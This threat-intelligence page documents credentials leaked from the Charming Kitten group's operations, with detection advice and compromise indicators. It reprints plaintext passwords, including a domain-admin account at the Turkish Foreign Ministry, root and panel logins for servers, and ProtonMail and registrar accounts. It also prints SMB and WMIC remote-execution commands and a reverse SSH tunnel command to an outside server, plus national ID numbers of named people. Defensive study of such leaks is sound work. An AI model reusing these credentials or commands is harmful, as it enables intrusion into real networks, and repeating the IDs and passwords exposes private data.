Skip to main content
SENSITIVE INFORMATION: This page contains actual credentials exposed from Charming Kitten’s operations. This information is provided for threat intelligence, incident response, and defensive security purposes only. Do not use for unauthorized access.

Overview

Episode 4 exposed extensive credential information maintained in plaintext Excel spreadsheets by:
  • MOHAMMAD NAJAFLOO (National ID: 4270878835) - Original credential database maintainer
  • MOHAMMADERFAN HAMIDIAREF (National ID: 0023199709) - Current maintainer
These credentials span:
  • Internal network access to compromised organizations
  • Communication platforms (ISABELLE, 3CX, SIGNAL)
  • File extraction and storage systems
  • Infrastructure management accounts

Internal Network Credentials

Turkish Foreign Ministry (MFA) Compromise

From eposta.txt found with BellaCiao source code: 
Primary Admin Account:
Username: Admin1@MFA
Password: KazimAtes1977+-*/!!KazimAtes1977+-*/!!

Usage: Domain-wide administrative access
WMIC commands: 
- Remote process execution
- File access across network
- Session management

Network Shares:
net use \\10.20.101.17\C$ "KazimAtes1977+-*/!!KazimAtes1977+-*/!!" /user:Admin1@MFA
net use \\10.20.105.21\C$ "KazimAtes1977+-*/!!KazimAtes1977+-*/!!" /user:Admin1@MFA
net use \\10.20.105.11\c$ KazimAtes1977+-*/!!KazimAtes1977+-*/!! /user:Admin1@MFA

pfSense/Network Admin:
Username: pfsenselondra@MFA
Password: 1234qqqQQQ

Usage: Firewall and network management

Remote Execution:
wmic /NODE:"10.20.105.25" /USER:"pfsenselondra@MFA" /PASSWORD:"1234qqqQQQ" 
  Process Call Create "cmd.exe /c reset session 3 >c:\\windows\\temp\\log.txt 2>&1"

Reverse SSH Tunnel User:
Username: ruby
Password: ruby@123!

Server: 103.57.251.153:443
Local Port: 40455
Remote Target: 10.20.105.11:3389

Command:
echo Y | c:\\windows\\temp\\vmware-tools.exe 103.57.251.153 -P 443 -C 
  -R 0.0.0.0:40455:10.20.105.11:3389 -l ruby -pw ruby@123!

Secondary Tunnel:
Username: Israel
Password: Israel@123!
Domains: twittsupport.com / msn-center.uk

Compromised Internal Network Topology

Documented internal IPs with access credentials:
IP AddressSystemAccess MethodCredentials
10.20.105.11Primary staging serverSMB/WMICAdmin1@MFA
10.20.105.21Secondary targetSMBAdmin1@MFA
10.20.105.25WorkstationWMICpfsenselondra@MFA
10.20.101.17Domain controllerSMB/WMICAdmin1@MFA
10.20.101.2TMG ServerWMICAdmin1@MFA
10.20.101.43Log collectionSMB shareAdmin1@MFA
10.20.106.60Compromised hostWMICAdmin1@MFA

Infrastructure Management Credentials

Hosting Provider Accounts

TheOnionHost

Multiple OperationsMoses Staff:Israel Talent:Dreamy Jobs:Wazayif Halima:Tecret:

Impreza Host

Tor Hosting ServicesMoses Staff:Abrahams Ax Tor:Abrahams Ax Host:

PQ Hosting

BBM MovementVPS:
  • bill.pq.hosting
  • [email protected]
  • 5U5v6L0s
  • Date: 20/02/2024 - €21 (3 months)
  • Ticket: #2070
ISPMGR:

ModernizMir

Domain & Hosting ResellerSecNetDC:
  • [email protected]
  • MXQ8GLX5qg3yEUV
  • Host: 23/8/2023 - $10
  • Domain: 10/1/2025 - $70
  • API: 3A5MBwQsQvJdernıZ3FtFMPnoБs6HfMdWK
  • Ticket: #2063
Tecret Domain:

Domain Registrar Accounts

Cavinet:
Account: [email protected]
Password: CMEPZ9WMb8difTw
Domain: cavinet.org
Registration: 1/12/2022 - $60 (3 months)
Ticket: #2016

Moses Staff .io:
Account: [email protected]
Password: JHg&%asjh98*&^$dI&*^fd
Domain: moses-staff.io
Registration: 1/9/2024
Ticket: #2073

Moses Staff .to:
Account: [email protected]
Password: ghfycf6787$DSHJ&^%#q
Domain: moses-staff.to
Registration: 1/9/2024

Server Root Access

Direct root access credentials to operational infrastructure servers.
Abrahams Ax Server:
IP: 95.183.53.24
Root User: root
Root Password: Kcbha6ZsBuTg

aaPanel Control:
URL: https://95.183.53.24:37065/f63a6767
Username: le6ddou3
Password: 1cafff29

Moses Staff New Host:
URL: http://95.183.51.49:7800/88e6c70
Username: hhtfhtmz  
Password: EyfjC5t5bH@3eqw

Communication Platform Credentials

Internal Communication Systems

Charming Kitten used multiple platforms for internal coordination:

ISABELLE

Internal Chat Platform
  • IRGC-IO standard communication tool
  • Used for operational coordination
  • Referenced in Episode 1 & 2 leaks
  • Internal network only

3CX

VoIP Communication
  • Voice and messaging platform
  • Operational discussions
  • Employee coordination
  • Internal deployment

SIGNAL

Encrypted Messaging
  • External communications
  • Operational security
  • Mobile coordination
  • Mentioned in documentation

ProtonMail Accounts

Extensive use of ProtonMail for operational security:
Email AccountPasswordOperationsTicket
[email protected]CMEPZ9WMb8difTwCavinet infrastructure#2016
[email protected]5U5v6L0sBBM Movement hosting#2070
[email protected]MXQ8GLX5qg3yEUVSecNetDC services#2063
[email protected]RN8OiQ6Y(%H0 (host)
2tJuGXqHFbAJNjS (domain)		Tecret infrastructure#2067
[email protected]JHg&%asjh98*&^$dI&*^fdMoses Staff .io#2073
[email protected]ghfycf6787$DSHJ&^%#qMoses Staff .to-
[email protected]jgfk&^%hngGJ54*/s+*&%$hggfaD (TOR)
rbC5vMjZh98AGTe (impreza)		Moses Staff hosting#2023/#ms
[email protected]GF675%^#@6-*GH678f-G<br/>HG^&%hg4156-*fsvMoses Staff CloudDNS#2056
recivestaffCxZZspFuUfZF3m3-GMoses Staff mailbox#2041
[email protected]{1h)p0f_R(Ln
Kh74QjGDq35NtvB		Israel Talent#2029
[email protected]Ubefrp
zNUyBQVwb6jqT5M		Termite.nu-
[email protected]15aB@gd52$kD#Dreamy Jobs host#2066
[email protected]7?n9”b/Aj~)6ADreamy Jobs & Wazayif domains#2065/#2069
[email protected]n!hnuec?‘9*Pb2DWazayif Halima host-
[email protected]J7Z4pw-G (domain)
6EF94ELUgAKdPqH (creds)
dm4ac2FgrL#-G (host)		Abrahams Ax-
[email protected]vAFc,7mNvi+-GAbrahams Ax TOR-
[email protected]JHGF&(^T&OYGI
KUIYR(*&UG^&*Y		SSL certificates-

Alternate Email Services

Outlook Account:
[email protected]:YHJ*^&R(&FY%RE%&*
Purpose: SSL certificate registration alternate contact

File Extraction Systems

Data Exfiltration Methods

From Episode 4 documentation and BellaCiao analysis:
BellaCiao Webshell InterfaceThe deployed webshells provided file extraction capabilities:
# Webserver binding (from iis.ps1)
Local Interface: http://127.0.0.1:49450/
Reverse Tunnel: 127.0.0.1:9090127.0.0.1:49450

Features:
- File upload
- File download  
- Command execution
- Script execution
- Directory browsing
Webshell Deployment Paths:
IIS:
c:\inetpub\wwwroot\aspnet_client\aspnet.aspx
c:\inetpub\wwwroot\aspnet_client\system_web\aspnet.aspx

Exchange Server:
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\owafont.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\themes.aspx  
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\logon.aspx

Data Staging Locations

Compromised systems were used as staging points: 
Turkish MFA Network:
c:\windows\temp\Crashpad\log.txt
c:\windows\temp\vmware-tools.exe
c:\windows\temp\vmware.bat
c:\windows\temp\vmware.ps1
c:\programdata\microsoft\diagnostic\vmware-tools.exe
c:\programdata\microsoft\diagnostic\svchost.bat  
c:\programdata\microsoft\diagnostic\log.txt
F:\G0199911\ (Large data volume)

SMS and Verification Services

SMS PVA:
Service: smspva.com
Operation: Termite.nu
Date: 25/8/2022
Cost: $8
Ticket: #2045
Purpose: WhatsApp verification for phishing operations

Payment and Financial Credentials

Bitcoin Payment Tracking

Episode 4 includes 0-SERVICE-payment BTC.csv documenting Bitcoin transactions for infrastructure purchases.
The group maintained detailed records of BTC payments for:
  • Anonymous hosting services
  • Domain registrations through privacy-focused registrars
  • VPN and tunnel services
  • SMS verification services

Credential Security Analysis

Password Patterns

  1. High Complexity Strings: Random-looking combinations like jgfk&^%hngGJ54*/s+*&%$hggfaD
  2. Memorable Patterns: KazimAtes1977+-*/!!KazimAtes1977+-*/!! (repeated)
  3. Simple Passwords: 1234qqqQQQ, ruby@123!, Israel@123!
  4. Mixed Complexity: Some accounts use strong passwords, others use weak
  5. Special Characters: Heavy use of !@#$%^&*()
  6. No MFA: No evidence of multi-factor authentication

Operational Security Failures

Critical OPSEC Failures Identified:
  1. Plaintext Storage: All credentials stored in unencrypted Excel spreadsheets
  2. Centralized Documentation: Single point of failure for entire infrastructure
  3. Credential Reuse: Same ProtonMail accounts used across multiple services
  4. Predictable Patterns: Observable patterns in email account creation
  5. No Rotation: No evidence of credential rotation procedures
  6. Internal Network Compromise: Domain admin credentials documented in plaintext
  7. Shared Access: Multiple operators with access to credential database
  8. No Compartmentalization: Single spreadsheet contains all operational credentials

Ticket System

The group used a ticketing system for tracking infrastructure:
Ticket FormatOperationsExamples
#20XXNumbered tickets#2016, #2023, #2041, #2073
#[operation]Operation-specific#bbm, #ms
This system provides a timeline and attribution mechanism for infrastructure deployment.

Detection Recommendations

For Defenders:
  1. Credential Monitoring: Monitor for use of exposed credentials in authentication logs
  2. Email Pattern Detection: Watch for ProtonMail accounts with similar naming patterns
  3. Payment Trail Analysis: Track Bitcoin transactions to identified infrastructure providers
  4. Infrastructure Correlation: Cross-reference hosting providers with known campaigns
  5. Network Indicators: Monitor for connections to documented internal IPs (10.20..)

Compromise Indicators

If your organization was targeted, check for:
1

Account Activity

Search Active Directory for accounts matching: Admin1@MFA, pfsenselondra@MFA, or similar patterns
2

File Presence

Check for files at documented staging locations:
  • c:\windows\temp\vmware-tools.exe
  • c:\programdata\microsoft\diagnostic\*.exe
  • c:\inetpub\wwwroot\aspnet_client\*.aspx
3

Network Connections

Review firewall logs for connections to:
  • 103.57.251.153:443 (tunnel server)
  • 95.169.196.* (hosting infrastructure)
  • 95.183.51.* / 95.183.53.* (operation servers)
  • 212.175.168.58 (C2 server)
4

Service Presence

Check for malicious Windows services:
  • “Microsoft Exchange Services Log”
  • “Microsoft Exchange Agent Diagnostic Services”
  • “Microsoft Monitoring Exchange Services”

References

  • Episode 4 leak: 0-SERVICE-Service.csv - Infrastructure credential database
  • Episode 4 leak: 1-NET-Sheet1.csv - Network topology
  • Episode 4 leak: 0-SERVICE-payment BTC.csv - Payment records
  • Episode 3 leak: eposta.txt - Turkish MFA compromise credentials
  • Episode 3 leak: BellaCiao source code - Embedded credentials and infrastructure
  • Episode 1 & 2: Internal communication platform references (ISABELLE, 3CX, SIGNAL)

Build docs developers (and LLMs) love

Get started for freeTalk to us